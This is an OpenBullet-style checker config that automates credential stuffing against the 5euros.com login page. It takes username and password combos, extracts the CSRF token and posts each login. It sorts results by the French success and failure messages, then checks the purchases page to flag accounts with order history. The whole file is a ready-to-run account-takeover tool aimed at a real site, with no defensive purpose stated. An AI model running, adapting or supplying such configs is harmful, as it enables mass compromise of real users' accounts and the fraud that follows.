[SETTINGS]
{
  "Name": "5euro PROXYLESS",
  "SuggestedBots": 15,
  "MaxCPM": 0,
  "LastModified": "2021-05-27T21:32:56.5475827+02:00",
  "AdditionalInfo": "",
  "Author": "Scar.",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
FUNCTION URLEncode "<USER>" -> VAR "US" 

FUNCTION URLEncode "<PASS>" -> VAR "PS" 

REQUEST GET "https://5euros.com/connexion" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "name=\"_csrf_token\" value=\"" "\">" -> VAR "TK" 

REQUEST POST "https://5euros.com/connexion" 
  CONTENT "_csrf_token=<TK>&_username=<US>&_password=<PS>&_submit=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-G973N Build/PPR1.190810.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/74.0.3729.136 Mobile Safari/537.36" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 
  HEADER "Referer: https://5euros.com/connexion" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Accept-Language: en-DE,en-US;q=0.9,en;q=0.8" 
  HEADER "Host: 5euros.com" 
  HEADER "Connection: close" 
  HEADER "Content-Length: 114" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Origin: https://5euros.com" 
  HEADER "Upgrade-Insecure-Requests: 1" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Veuillez réessayer" 
  KEYCHAIN Success OR 
    KEY "Déconnexion" 

REQUEST GET "https://5euros.com/achats" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "Vous n'avez pas encore fait d'achat." 
  KEYCHAIN Success OR 
    KEY "<button class=\"btn-reset badge badge--black\" data-status-code=\"400\">Terminé</button>" 

